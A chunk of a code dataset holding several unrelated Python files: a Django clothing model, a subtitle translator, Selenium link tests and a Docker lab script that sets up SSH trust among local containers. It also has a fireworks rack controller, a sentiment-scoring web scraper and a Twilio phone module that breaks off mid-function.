кепки','Бейсболки и кепки'),\n ('Береты','Береты'),\n ('Банданы','Банданы'),\n ('Панамы','Панамы'),\n ('Шапки','Шапки'),\n ('Шляпы','Шляпы'),\n )\n HOME=(\n ('Пижамы','Пижамы'),\n ('Халаты','Халаты'),\n )\n COVERALL=(\n ('Полукомбинезоны','Полукомбинезоны'),\n ('Комбинезоны','Комбинезоны'),\n )\n\n UNDERWEAR=(\n ('Носки','Носки'),\n ('Термобелье','Термобелье'),\n ('Трусы','Трусы'),\n ('Плавки','Плавки'),\n )\n SHOES=(\n ('Ботинки','Ботинки'),\n ('Валенки и галоши','Валенки и галоши'),\n ('Домашняя обувь','Домашняя обувь'),\n ('Кеды','Кеды'),\n ('Кроссовки','Кроссовки'),\n ('Мокасины','Мокасины'),\n ('Сандалии','Сандалии'),\n ('Сапоги','Сапоги'),\n ('Слипоны','Слипоны'),\n ('Тапочки','Тапочки'),\n ('Туфли','Туфли'),\n ('Угги и унты','Угги и унты'),\n ('Шлепанцы','Шлепанцы'),\n )\n SHOE_SIZE=(\n ('38','38'),\n ('39','39'),\n ('40','40'),\n ('41','41'),\n ('42','42'),\n ('43','43'),\n ('44','44'),\n ('45','45'),\n ('46','46'),\n )\n SUITS=(\n ('Жакеты','Жакеты'),\n ('Жилетки','Жилетки'),\n ('Костюмы','Костюмы'),\n ('Пиджаки','Пиджаки'),\n )\n SHIRTS =(\n ('Джинсовые','Джинсовые'),\n ('Длинный рукав','Длинный рукав'),\n ('Короткий рукав','Короткий рукав'),\n )\n SWEETERS=(\n ('Водолазки','Водолазки'),\n ('Джемперы','Джемперы'),\n ('Кардиганы','Кардиганы'),\n ('Кофты','Кофты'),\n ('Олимпайки','Олимпайки'),\n ('Пуловеры','Пуловеры'),\n ('Свитеры','Свитеры'),\n ('Толстовки и худи','Толстовки и худи'),\n )\n SPORTWEAR=(\n ('Верхняя одежда','Верхняя одежда'),\n ('Спортивные костюмы','Спортивные костюмы'),\n ('Футболки и поло','Футболки и поло'),\n ('Штаны и шорты','Штаны и шорты'),\n )\n TOPS=(\n ('Лонгсливы','Лонгсливы'),\n ('Майки','Майки'),\n ('Поло','Поло'),\n ('Футболки','Футболки'),\n )\n PANTS=(\n ('Бриджы','Бриджы'),\n ('Брюки','Брюки'),\n ('Джинсы','Джинсы'),\n ('Шорты','Шорты'),\n )\n PANT_SIZE=(\n ('28','28'),\n ('29','29'),\n ('30','30'),\n ('31','31'),\n ('32','32'),\n ('33','33'),\n ('34','34'),\n ('35','35'),\n ('36','36'),\n ('37','37'),\n ('38 и больше','38 и больше'),\n )\n\n type = models.CharField(max_length=50, blank=True, choices = TYPE, verbose_name=\"Тип аксессуара\")\n brand = models.CharField(max_length=50, blank=True, choices = BRANDS, verbose_name=\"Бренд\")\n color=models.CharField(max_length=45, blank=True, choices = COLOR, verbose_name=\"Цвет\")\n condition = models.CharField(max_length=50, blank=True, choices = CONDITION, verbose_name=\"Состояние\")\n size = models.CharField(max_length=50, blank=True, choices = SIZE, verbose_name=\"Размер\")\n season = models.CharField(max_length=50, blank=True, choices = SEASON, verbose_name=\"Сезон\")\n outerwear = models.CharField(max_length=50, blank=True, choices = OUTERWEAR, verbose_name=\"Верхняя одежда\")\n hat = models.CharField(max_length=50, blank=True, choices = HAT, verbose_name=\"Головные уборы\")\n home = models.CharField(max_length=50, blank=True, choices = HOME, verbose_name=\"Домашняя одежда\")\n coverall = models.CharField(max_length=50, blank=True, choices = COVERALL, verbose_name=\"Комбинезоны\")\n underwear = models.CharField(max_length=50, blank=True, choices = UNDERWEAR, verbose_name=\"Нижнее белье\")\n shoes = models.CharField(max_length=50, blank=True, choices = SHOES, verbose_name=\"Обувь\")\n shoe_size = models.CharField(max_length=50, blank=True, choices = SHOE_SIZE, verbose_name=\"Размер обуви\")\n suits = models.CharField(max_length=50, blank=True, choices = SUITS, verbose_name=\"Пиджаки и костюмы\")\n shirts = models.CharField(max_length=50, blank=True, choices = SHIRTS, verbose_name=\"Рубашки\")\n sweaters = models.CharField(max_length=50, blank=True, choices = SWEETERS, verbose_name=\"Свитера и толстовки\")\n sportwear = models.CharField(max_length=50, blank=True, choices = SPORTWEAR, verbose_name=\"Спортивная одежда\")\n tops = models.CharField(max_length=50, blank=True, choices = TOPS, verbose_name=\"Футболки и поло\")\n pants = models.CharField(max_length=50, blank=True, choices = PANTS, verbose_name=\"Штаны и шорты\")\n pant_size = models.CharField(max_length=50, blank=True, choices = PANT_SIZE, verbose_name=\"Размер штанов\")\n\n class Meta:\n verbose_name = \"Мужской гардероб\"\n verbose_name_plural = \"Мужской гардероб\"\n","sub_path":"ad_model/man.py","file_name":"man.py","file_ext":"py","file_size_in_byte":12756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"76140142","text":"from translate import Translator\nimport os\n\n'''\n仅支持一种格式😂 不打算改\nexample:\n 1\n 00:00:00.620 --> 00:00:01.540\n bulabulabula( /./!)\n \n num\n time --> time\n texts\n\n'''\n\ndef entozh(sotext):\n tr=Translator(to_lang='chinese')\n return tr.translate(sotext)\n\ndef xuanze():\n tt=[]\n for a,b,c in os.walk('.'):\n tt=c\n break\n i=0\n while 1:\n try:\n if tt[i][-3:]!='txt':\n del tt[i]\n else:\n i+=1\n except:\n break\n j=0\n for i in tt:\n print('%d %s'%(j,i))\n j+=1\n return tt[int(input('choose num:'))]\n\n\ndef main():\n with open('%s'%(xuanze()),'r') as f:\n data=f.read().split('\\n')\n sub=[]\n \n #格式化部分\n for i in range(len(data)):\n if data[i]=='':\n continue\n try:\n int(data[i])\n subtime1=data[i+1][:12]\n subtime2=data[i+1][17:]\n scontent=''\n try:\n for k in (2,3,4,5):\n if data[i+k]!='':\n scontent+=' '+data[i+k]\n else:\n break\n except:\n pass\n finally:\n sub.append([subtime1,subtime2,scontent])\n except:\n pass\n sub1=[]\n for i in sub:\n sub1.append([i[0],i[1],i[2]])\n i=0\n while 1:\n try:\n for k in range(9):\n if sub1[i+k][2][-1]=='.' or sub1[i+k][2][-1]=='!':\n if k==0:\n break\n for q in range(k):\n sub1[i][2]+=' '+sub1[i+1][2]\n sub1[i][1]=sub1[i+1][1]\n del sub1[i+1]\n break\n i+=1\n except:\n break\n #格式化结束\n\n k=len(sub1)\n for i in range(k):\n os.system('clear')\n if i+1!=k:\n print('翻译中',end='')\n else:\n print('已完成',end='')\n print('%d/%d'%(i+1,k))\n sub1[i][2]=entozh(sub1[i][2])\n with open('zimu.py','w') as f:\n f.write('szimu='+str(sub)+'\\n\\n'+'tzimu='+str(sub1))\n\n print('ok!')\n\nif __name__=='__main__':\n main()\n","sub_path":"1字幕生成.py","file_name":"1字幕生成.py","file_ext":"py","file_size_in_byte":2268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"628796258","text":"import allure\nimport requests\nimport time\nfrom allure_commons.types import AttachmentType\nfrom selenium import webdriver\nimport pytest\nfrom datetime import datetime\nfrom selenium.webdriver.common.keys import Keys\nfrom bs4 import BeautifulSoup\n\n\nclass TestPageSearch:\n def setup(self):\n self.driver = webdriver.Chrome((\"C:/Users/shubina/PycharmProjects/chromedriver\"))\n self.driver.maximize_window()\n self.urls = ['http://staging-leto19.letomall.ru/stores-category/all',\n 'http://staging-kry19.planeta-mall.ru/stores-category/all',\n 'http://staging-nkz19.planeta-mall.ru/stores-category/all',\n 'http://staging-aura19.planeta-mall.ru/stores-category/all',\n 'http://staging-ufa19.planeta-mall.ru/stores-category/all']\n\n def teardown(self):\n self.driver.quit()\n\n def test_check_all_urls(self):\n urls = self.urls\n errors = []\n for url in urls:\n re = requests.get(url)\n soupe = BeautifulSoup(re.text, 'lxml')\n\n all_promo = soupe.find_all(class_='item item-store')\n for one_promo in all_promo:\n r = requests.get((one_promo.get('href')))\n try:\n assert r.status_code == 200\n except Exception as e:\n errors.append(str(r.status_code) + ' status has a link ' + one_promo.get('href'))\n assert not errors, \"errors occured:\\n{}\".format(\"\\n\".join(errors))\n\n def test_store_view_switches(self):\n driver = self.driver\n urls = self.urls\n errors = []\n for url in urls:\n driver.get(url)\n driver.implicitly_wait(3)\n for i in range(2):\n try:\n # driver.find_element_by_xpath('//main//section[@class =\"pageSection\"]')\n # print('ya')\n driver.find_element_by_xpath('//a[@class = \"viewToggle viewToggle-alpha \"]').click()\n time.sleep(1)\n assert driver.find_element_by_xpath('//main//section[@class =\"storesOrderedList\"]')\n driver.find_element_by_xpath('//a[@class = \"viewToggle viewToggle-cards \"]').click()\n time.sleep(1)\n assert driver.find_element_by_xpath('//main//section[@class =\"pageSection\"]')\n except Exception as e:\n errors.append('Switch does not work ' + url)\n assert not errors, \"errors occured:\\n{}\".format(\"\\n\".join(errors))\n","sub_path":"13.1. All stores/test_elements_on_the_page_All_stores.py","file_name":"test_elements_on_the_page_All_stores.py","file_ext":"py","file_size_in_byte":2556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"506082339","text":"import parser_library\r\n\r\ndef main():\r\n \r\n \r\n # Checks working directory \r\n # and creates it if not available if argument is given,\r\n # subdirectory is created\r\n path_local_archive = parser_library.get_or_create_output_folder()\r\n \r\n # gets all books through counting from 1 to max \r\n # parser_library.get_all_books(path_local_archive)\r\n #Get metadata\r\n parser_library.get_all(path_local_archive)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()","sub_path":"Gutenberg-Bot/gutenberg_bot.py","file_name":"gutenberg_bot.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"590219513","text":"import rack\nimport yaml\nimport random\nfrom logzero import logger\n\nclass rackset:\n\n def __init__(self):\n self.rack_array = [] #create an empty set of racks\n\n def add_rack(self, rack_address = 0x20, rack_size = 16, fire_state = False):\n \"\"\"Add a new rack to the rackset.\"\"\"\n self.rack_array.append(rack.rack(rack_address, rack_size, fire_state))\n\n def add_rack_from_config(self,config):\n # Setup rack address\n if 'rack_address' in config:\n rack_address = config['rack_address']\n else:\n rack_address = False\n\n # Setup rack map\n if 'map' in config:\n rack_map = config['map']\n else:\n rack_map = [8, 0, 9, 1, 10, 2, 11, 3, 12, 4, 13, 5, 14, 6, 15, 7]\n\n # setup rack firing time\n if 'firing_time' in config:\n firing_time = config['firing_time']\n else:\n firing_time = 5\n\n # Setup rack size\n if 'rack_size' in config:\n rack_size = config['rack_size']\n elif 'descriptions' in config:\n rack_size = len(config['descriptions'])\n else:\n rack_size = 16\n\n # Setup fire state\n if 'fire_state' in config:\n fire_state = config['fire_state']\n else:\n fire_state = False\n \n # Setup channels\n if 'descriptions' in config:\n channels = config['descriptions']\n else:\n channels = False\n\n self.rack_array.append(rack.rack(rack_address, rack_size, fire_state, channels, rack_map, firing_time))\n\n def load_racks_from_file(self, filename):\n a_yaml_file = open(filename)\n config = yaml.load(a_yaml_file, Loader=yaml.FullLoader)\n for rack in config['racks']:\n self.add_rack_from_config(rack)\n\n def status(self):\n status = []\n for i in range(0,self.size()):\n status.append(self.rack_array[i].status())\n return status\n\n def fire_list(self):\n mylist = []\n mylist.append(\"http://piro:5000/rackset/fire/random\" )\n for i in range(0,self.size()):\n for j in range(0, self.rack_array[i].rack_size):\n mylist.append(\"http://piro:5000/rackset/fire/\" + str(i) + \"/\" + str(j) )\n return mylist\n\n def size(self):\n return len(self.rack_array)\n\n def all_fired(self):\n status = True\n for rack in range(0,self.size()):\n if not self.rack_array[rack].all_fired():\n status = False\n return status\n return status\n\n\n def fire_channel(self, rack, channel):\n return self.rack_array[rack].fire_channel_thread(channel)\n \n def fire_random(self):\n if self.all_fired():\n logger.error(\"Can't fire, no unfired channels available\")\n return False\n while True:\n rack = random.randrange(self.size())\n if not self.rack_array[rack].all_fired():\n break\n fired_channel = self.rack_array[rack].fire_random()\n return rack, fired_channel\n \n def reset(self):\n for rack in range(0,self.size()):\n self.rack_array[rack].reset_all_channels()\n\n def clear(self):\n self.rack_array = []","sub_path":"rackset.py","file_name":"rackset.py","file_ext":"py","file_size_in_byte":3261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"614325320","text":"import docker\nimport math\nimport os\n\nnames = [\"dock1\", \"dock2\", \"dock3\", \"dock4\", \"dock5\", \"dock6\", \"dock7\", \"dock8\", \"dock9\"]\nimage_name = \"balintsz/magic_docker:ssh2\"\nssh_keys_path = \"/root/.ssh\"\nssh_private_key_name = \"id_rsa\"\nssh_public_key_name = \"id_rsa.pub\"\nssh_auth_key_name = \"authorized_keys\"\npriv_path = os.path.join(ssh_keys_path, ssh_private_key_name)\npub_path = os.path.join(ssh_keys_path, ssh_public_key_name)\nauth_path = os.path.join(ssh_keys_path, ssh_auth_key_name)\nconfig_path = \"/root/config.json\"\nBARRIER_FIREWALL = 0.8\nNON_BARRIER_FIREWALL = 0.5\nNR_GRID = math.floor(math.sqrt(len(names)))\n\ndocker_info = []\n\n\ndef create_dockers():\n size = len(names)\n barrier_x = NR_GRID // 2\n for i in range(len(names)):\n docker_dict = dict()\n docker_dict[\"Name\"] = names[i]\n docker_dict[\"Location\"] = get_coordinates(i, NR_GRID)\n create_docker(docker_dict[\"Name\"])\n start_ssh(docker_dict[\"Name\"])\n docker_dict[\"Ip\"] = client.api.inspect_container(docker_dict[\"Name\"])['NetworkSettings']['Networks']['bridge']['IPAddress']\n docker_dict[\"Infected\"] = \"No\"\n if docker_dict[\"Location\"]['x'] == barrier_x:\n docker_dict[\"Firewall\"] = BARRIER_FIREWALL\n else:\n docker_dict[\"Firewall\"] = NON_BARRIER_FIREWALL\n docker_info.append(docker_dict)\n gen_ssh_key(i)\n create_neighbours()\n all_handshakes()\n drop_configs()\n\n\ndef drop_configs():\n for i in range(len(names)):\n command = build_command(\"echo \" + str(docker_info[i]) + \" >> \" + config_path)\n my_exec = client.api.exec_create(docker_info[i][\"Name\"], command)\n client.api.exec_start(my_exec)\n\n\ndef create_neighbours():\n for i in range(len(names)):\n docker_info[i][\"Neighbours\"] = [{'Name': docker_info[neighbour_index][\"Name\"],\n 'Ip': docker_info[neighbour_index][\"Ip\"],\n 'Firewall': docker_info[neighbour_index][\"Firewall\"]}\n for neighbour_index in get_neighbours(i)]\n\n\ndef get_neighbours(i):\n neighbours = []\n size = math.floor(math.sqrt(len(names)))\n coords = get_coordinates(i, size)\n north = {'x': coords['x'], 'y': coords['y'] - 1}\n south = {'x': coords['x'], 'y': coords['y'] + 1}\n east = {'x': coords['x'] + 1, 'y': coords['y']}\n west = {'x': coords['x'] - 1, 'y': coords['y']}\n possible_neighbours = [north, west, south, east]\n for j in range(4):\n neighbour = possible_neighbours[j]\n if exists_neighbour(neighbour, size):\n neighbours.append(size * neighbour['x'] + neighbour['y'])\n return neighbours\n\n\ndef exists_neighbour(coords, size):\n return coords['x'] in range(size) and coords['y'] in range(size)\n\n\ndef get_coordinates(dock_index, size):\n return {'x': dock_index // size, 'y': dock_index % size}\n\n\ndef remove_dockers():\n for i in range(len(names)):\n client.api.stop(docker_info[i][\"Name\"])\n client.api.remove_container(docker_info[i][\"Name\"])\n\n\ndef print_dockers():\n for i in range(len(names)):\n print(docker_to_str(i))\n\n\ndef docker_to_str(index):\n return str(docker_info[index])\n\n\ndef create_docker(docker_name):\n client.containers.create(image_name,\n command=\"/bin/bash\",\n name=docker_name,\n detach=True,\n tty=True,\n stdin_open=True)\n client.api.start(docker_name)\n\n\ndef ping_it(whatip):\n my_exec = client.api.exec_create(docker_info[0][\"Name\"], 'ping -c 2 ' + whatip)\n stream_val = client.api.exec_start(my_exec, stream=True)\n for stream_line in stream_val:\n print(stream_line)\n\n\ndef start_ssh(docker_name):\n my_exec = client.api.exec_create(docker_name, \"/usr/sbin/sshd\")\n client.api.exec_start(my_exec)\n\n\ndef gen_ssh_keys():\n for i in range(len(names)):\n gen_ssh_key(i)\n\n\ndef gen_ssh_key(i):\n command = \"ssh-keygen -b 2048 -t rsa -f \" + priv_path + \" -q -N \\\"\\\"\";\n print(command)\n my_exec = client.api.exec_create(docker_info[i][\"Name\"], command)\n client.api.exec_start(my_exec, stream=True)\n\n\ndef get_public_key(dock):\n command = \"cat \" + pub_path\n print(command)\n my_exec = client.api.exec_create(dock, command)\n stream_val = client.api.exec_start(my_exec, stream=True)\n retVal = ''\n for val in stream_val:\n retVal += str(val)\n return retVal[2:][:-3]\n\n\ndef put_public_key(dock, public_key):\n command = build_command(\"echo \" + public_key + \" >> \" + auth_path)\n print(command)\n my_exec = client.api.exec_create(dock, command)\n stream_val = client.api.exec_start(my_exec, stream=True)\n for val in stream_val:\n print(val)\n\n\ndef build_command(original_command):\n return \"bash -c \\\"\" + original_command + \"\\\"\"\n\n\ndef one_handshake(dock1, dock2):\n put_public_key(dock2, get_public_key(dock1))\n\n\ndef all_handshakes():\n nr_docks = len(names)\n for i in range(nr_docks):\n for j in range(nr_docks):\n if i != j:\n one_handshake(docker_info[i][\"Name\"], docker_info[j][\"Name\"])\n\n\nif __name__ == '__main__':\n client = docker.from_env()\n create_dockers()\n print(client.containers.list())\n print_dockers()\n ping_it(docker_info[1][\"Ip\"])\n input(\"Press a key to continue...\")\n remove_dockers()\n print(client.containers.list())","sub_path":"y3se1/se/nvi/dockerpy/test5_neighbours/test5.py","file_name":"test5.py","file_ext":"py","file_size_in_byte":5441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"124905010","text":"sample_text = (\" As Pythons creator I d like to say a few words about its \"+\r\n \"origins adding a bit of personal philosophy \"+\r\n \"Over six years ago in December I was looking for a \"+\r\n \"hobby programming project that would keep me occupied \"+\r\n \"during the week around Christmas My office \"+\r\n \"a government run research lab in Amsterdam would be closed \"+\r\n \"but I had a home computer and not much else on my hands \"+\r\n \" I decided to write an interpreter for the new scripting \"+\r\n \"language I had been thinking about lately a descendant of ABC \"+\r\n \"that would appeal to UnixC hackers I chose Python as a \"+\r\n \"working title for the project being in a slightly irreverent \"+\r\n \"mood and a big fan of Monty Pythons Flying Circus\")\r\n\r\ndef get_words_starting_with(text, letter):\r\n letter = letter\r\n word_list = text.lower().split()\r\n same_words = []\r\n duplicates = 0\r\n duplicate_list = []\r\n## print(word_list)\r\n\r\n for i in word_list:\r\n if i[0] == letter.upper() or i[0] == letter.lower() and not i in same_words:\r\n same_words.append(i)\r\n elif i[0] == letter.upper() or i[0] == letter.lower() and i in same_words:\r\n for j in word_list:\r\n if j == i and not i in duplicate_list:\r\n duplicate_list.append(i)\r\n \r\n for k in duplicate_list:\r\n for i in word_list:\r\n if k == i:\r\n duplicates += 1\r\n print(\"There are\", duplicates, \" duplicates of the word\", k)\r\n duplicates = 0\r\n \r\n print(duplicate_list)\r\n print(same_words)\r\n\r\n\r\nget_words_starting_with(sample_text,\"p\")\r\n\r\n","sub_path":"Practical 05/Exercise 2-4 - Word beginning with a letter.py","file_name":"Exercise 2-4 - Word beginning with a letter.py","file_ext":"py","file_size_in_byte":1782,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"457221643","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\n\nAuthor: Nick Hughes\nWebsite: absolutelynick.co.uk\n\nCreated: 18/01/2015\n\n(C) 01/2015\n\n Searches given websites, links, images and looks for Positive and Negative Data\n\n from pprint import pformat as pp\n scrubber = Scrub(\n searchSites = 3 # (list or int) list of sites or number to search\n # searchSites = [\"http://www.bbc.co.uk/\"], \"http://www.gov.uk/\"],\n searchText = \"football\",\n searchPictures = 0,\n checkUrl = 0,\n keywords = [\"foot\",\"player\",\"big\"],\n debug = False,\n )\n info = scrubber.Run()\n print type(info)\n print len(info)\n print pp(dict(info))\n\n\"\"\"\n\nimport os\nimport urllib2\nimport common\nimport re\n\nfrom words import words\nfrom image_ocr import image_ocr\nfrom datetime import datetime as time\nfrom BeautifulSoup import BeautifulSoup, Comment\nfrom pattern.en import sentiment\nfrom google import search\n\n\nclass Storage(dict):\n\n def __init__(self, data):\n\n for d in data: self[d] = {}\n\n def __getattr__(self, name):\n return self[name]\n\n def __setattr__(self, name, value):\n self[name] = value\n\nclass Scrub(object):\n\n def __init__(self, **kwargs ):\n\n # Basic check for input\n\n self.Check_Input(kwargs)\n\n self.path = os.path.dirname(__file__)\n\n # Returns current load information from the window for users\n\n self.progressBar = kwargs[\"progressBar\"] if \"progressBar\" in kwargs else None\n\n # Parameters needed for running\n\n self.searchText = kwargs[\"searchText\"].lower()\n self.searchPictures = kwargs[\"searchPictures\"] if \"searchPictures\" in kwargs else 0\n self.checkUrl = kwargs[\"checkUrl\"] if \"checkUrl\" in kwargs else 0\n self.keywords = kwargs[\"keywords\"] if \"keywords\" in kwargs else []\n self.debug = kwargs[\"debug\"] if \"debug\" in kwargs else 0\n\n self.positiveWords = set(words.Positive_Words())\n self.negativeWords = set(words.Negative_Words())\n self.profanityWords = set(words.Profanity())\n\n # Getting sites to search\n\n self.websites = self.Get_Websites(kwargs)\n\n self.website_Dict = Storage(self.websites)\n\n\n def Run(self):\n \"\"\"\n Main function to call when script has been initiated with args for running.\n\n Reads the sites with set parameters and returns gathered information.\n\n :return: Returns all the gathered data to the user\n :rtype: Dict\n \"\"\"\n\n if self.progressBar: self.progressBar(setMax=len(self.websites),value=0 )\n\n if not self.websites: return None\n\n for num,url in enumerate(self.websites):\n\n text = self.__Get_ProgressBar_Text__(url)\n\n # Try for the setup catching websites failing to load\n if self.progressBar: self.progressBar(text=text,value=(num+1))\n\n if self.checkUrl and (common.Check_Url(url) == False): continue\n\n data = self.Read_Website(url)\n\n self.website_Dict[url] = data\n\n return self.website_Dict\n\n @staticmethod\n def __Get_ProgressBar_Text__(url):\n \"\"\"\n Formats the text for easier readability of the user\n :param url: Web URL Address\n :type url: String\n :return: Formatted string\n :rtype: String\n \"\"\"\n\n cleaners = [\"http://www.\",\"http://\",\"https://\",\"https:\",\"www1.\"]\n\n for i in cleaners: url = url.replace(i,\"\")\n\n if url.split(\"/\",1)[0] == url.split(\"/\",1)[-1]:\n\n return \"Scanning:\\n\\n%s\" % url.split(\"/\",1)[0]\n\n return \"Scanning:\\n\\n%s\\n%s\" % (url.split(\"/\",1)[0],url.split(\"/\",1)[-1])\n\n @staticmethod\n def Get_Websites(args):\n \"\"\"\n If websites are not provided in Kwargs then will use google to get a list.\n :param args: Website Kwargs\n :type args: Dict\n :return: Websites that can be scrubbed, either provided or gathered\n :rtype: List\n \"\"\"\n\n sites = args[\"searchSites\"]\n\n if type(sites) != list:\n try:\n googleSites = [str(i) for i in search(str(args[\"searchText\"]), stop=sites)]\n sites = googleSites[:sites]\n except urllib2.HTTPError:\n return []\n\n return sites\n\n @staticmethod\n def Check_Input(args):\n \"\"\"\n Keyword check for needed parameters of the script\n :param args: Website Kwargs\n :type args: Dict\n :return: Raises error if params not met\n\n \"\"\"\n\n if (\"searchSites\" not in args) and type(args[\"searchSites\"]) != (list or int):\n\n raise ValueError(\"Please enter a list of Websites ('searchSites') or an amount of sites to search as an integer.\")\n\n def Read_Website(self, siteName):\n \"\"\"\n Reads information from a website\n\n Variables:\n\n siteName = ( site name after 'www.' )\n\n :param siteName: Website Address\n :type siteName: String\n :return: Site data\n :rtype: Dict\n\n \"\"\"\n # Call to the site to gather the data\n\n rawData = self.Get_Website_Data(siteName)\n\n # Cleans the data removing tags\n cleanData, imageCount = self.Get_Untagged_Body_Data(rawData)\n\n # Search with in the list of Positive and negative keywords\n dataSet = set(cleanData.split(\" \"))\n\n return {\n \"last_updated\":common.Last_Modified(siteName),\n \"clean_data\":cleanData,\n \"images\": imageCount,\n \"search_word\":cleanData.count(self.searchText),\n \"search_keywords\": self.Search_Keywords(cleanData),\n \"language_analysis\":self.Language_Analysis(cleanData),\n \"profanity_words\":len(dataSet.intersection(self.profanityWords)),\n \"positive_words\":len(dataSet.intersection(self.positiveWords)),\n \"negative_words\":len(dataSet.intersection(self.negativeWords)),\n \"neutral_words\":self.Get_Neutral_Words(cleanData),\n }\n\n def Get_Neutral_Words(self, data):\n \"\"\"\n Scanning for neutral words\n :param data: Cleaned String\n :type data: String\n :return: Length of neutral words\n :rtype: Integer\n \"\"\"\n wordSentiment = set([i[0][0] for i in sentiment(data).assessments])\n\n # Removes unneeded punctuation\n cleanData = [i for i in re.findall(r\"[\\w']+|[.,!?;]\", data) if len(i)>2]\n\n # Finds that symmetric difference\n neutral = len( set(wordSentiment) ^ set(cleanData))\n\n return neutral\n\n def Get_Untagged_Body_Data(self, raw_data): # TODO\n \"\"\"\n Remove the unwanted data outside of the body tags in the HTML\n :param raw_data: Read HTML Page\n :type raw_data: String\n :return: Cleaned body text\n :rtype: String\n \"\"\"\n try:\n\n return self.Clean_Site_Data(raw_data)\n\n except AttributeError: # NoneTypeError returned from body read or Ascii Issue\n\n return raw_data, 0\n\n def Search_Keywords(self, text):\n \"\"\"\n Search for keywords in the website clean text\n :param text: Website text\n :type text: string\n :return: the amount of matching words found\n :rtype: integer\n \"\"\"\n\n if self.keywords:\n\n word_count = dict( (word,text.count(word)) for word in self.keywords )\n\n return word_count if self.keywords else {}\n\n def Clean_Site_Data(self, data):\n \"\"\"\n Changes all the data to a beautiful soup object. Cleans the full site tags and data\n :param data: Website readout\n :type data: string\n :return: The full site with the tags removed and only the text visible to the user\n :return: The image amounts\n :rtype: string, integer\n \"\"\"\n\n if not data: return \"\", 0\n\n # Module for looking over the content of the site\n soup = BeautifulSoup(data)\n\n # Takes all the data from inside the html tags body\n try:\n soup = BeautifulSoup(\"\".join([ str(i) for i in (soup.body) if str(i) ]))\n except TypeError:\n return \"\", 0\n\n data = self.Remove_HTML_Layers(soup)\n\n pageImages = []\n\n # Search images for text\n if self.searchPictures:\n\n # Get address of all images\n pageImages = [str(i[\"src\"]) for i in soup.findAll('img', {\"src\": True}) if \"http://\" in i[\"src\"]]\n\n try:\n if pageImages: data += self.Get_Image_Text(pageImages)\n except UnicodeEncodeError:\n pass\n\n return data, len(pageImages)\n\n @staticmethod\n def Remove_HTML_Layers(soup):\n \"\"\"\n Cleans all the site string and unicode data, from all the comments and tags.\n :param data: html soup\n :type data: soup object\n :return: The full site with the tags removed and only the text visible to the user\n :rtype: string\n \"\"\"\n # Remove coding Comments\n [c.extract() for c in soup.findAll(text=lambda text:isinstance(text, Comment))]\n\n # Remove the HTML Tags\n [[s.extract() for s in soup(tag)] for tag in [\"script\",\"img\",\"noscript\",\"form\",\"style\"]]\n\n checker = lambda i: i not in [\"\\n\",\"\\t\",\"\\r\",\" \"]\n\n texts = \" \".join([str(i) for i in soup.findAll(text=True) if checker(i) ] )\n\n for item in [\"\\n\",\"\\t\",\"\\r\",\" \",\"&\"]: texts = texts.replace(item,\" \")\n\n # Common Unicode issues with the data\n data = \" \".join([str(i) for i in texts.split(\" \") if i != \"\"]).replace(\"'\",\"'\").replace(\" ; \",\"\").replace(\"’\",\"'\")\n\n return data\n\n @staticmethod\n def Get_Image_Text(images):\n \"\"\"\n Search images for text\n :param images: Image paths\n :type images: List of strings\n :return: Text Found\n :rtype: String\n \"\"\"\n\n text = \"\"\n\n for img in images:\n\n OCR = image_ocr.Image_OCR()\n\n imageText = OCR.Read_Image(\n loadFile = img,\n read_photo = True ,\n delete = True,\n )\n\n if imageText: text += \". \" + imageText\n\n return text\n\n @staticmethod\n def Language_Analysis(text):\n \"\"\"\n Takes a sentence or or paragraph for analysis with the sentiment module looking for positivity and negativity\n :param text: Sentence or Paragraph\n :type text: string\n :return: (1 to -1, 1 to -1) positivity, subjectivity\n :rtype: tuple\n \"\"\"\n\n return tuple(sentiment(text))\n\n @staticmethod\n def Get_Website_Data(url):\n \"\"\"\n Looks at a web Url and checks that it exists and loads\n :param url: Web Address\n :type url: String\n :return: Website code\n :rtype: String\n \"\"\"\n\n try: response = str(urllib2.urlopen(url).read())\n except (urllib2.HTTPError,urllib2.URLError):\n response = \"\"\n\n return response.lower()\n\n @staticmethod\n def Get_Datetime(option=1):\n \"\"\"\n Gives you current time\n :param option: Format wanted\n :type option: int\n :return: date and time\n :rtype: string\n \"\"\"\n\n timeOutput = time.strftime(\"%Y_%m_%d__%H_%M\") if option == 1 else time.strftime(\"%Y_%m_%d %H:%M\")\n\n return timeOutput\n","sub_path":"modules/web_scrubber/website_scrubber.py","file_name":"website_scrubber.py","file_ext":"py","file_size_in_byte":11625,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"463931685","text":"from twilio.rest import Client\nfrom twilio.base.exceptions import TwilioRestException\nimport toml\nimport logging\n\nfrom ..utils import export\nfrom .. import _config\n\n_logger = logging.getLogger('lds_robocalling.services.phone')\n_config = _config['phone']\n_client = Client(_config['account_sid'], _config['auth_token'])\n\ndef clean_number(number):\n if number is None:\n return ''\n elif number.startswith('+1'):\n number = number[2:]\n elif number.startswith('1'):\n number = number[1:]\n return ''.join(c for c in number if c.isdigit())\n\ndef compare_numbers(num1,num2):\n return clean_number(num1) == clean_number(num2)\n\n@export\ndef national_format(num):\n num = clean_number(num)\n return '({}) {}-{}'.format(num[:3], num[3:6],num[6:])\n\nfrom . import db\n_phone_book = db.get_phone_book()\n\n@export\ndef text(self, body, to=None):\n if to is None: to = _config['admin_number']\n to = clean_number(to)\n message = _client.messages.create(body=body, to=to, from_=_config['phone_number']) \n\n@export\ndef lookup(number):\n number = clean_number(number)\n if len(number) < 8:\n return number,'invalid'\n elif national_format(number) in _phone_book:\n return number, _phone_book[national_format(number)]\n try:\n number_data = _client.lookups.phone_numbers.get(number).fetch(add_ons='twilio_carrier_info')\n number_data.phone_number \n 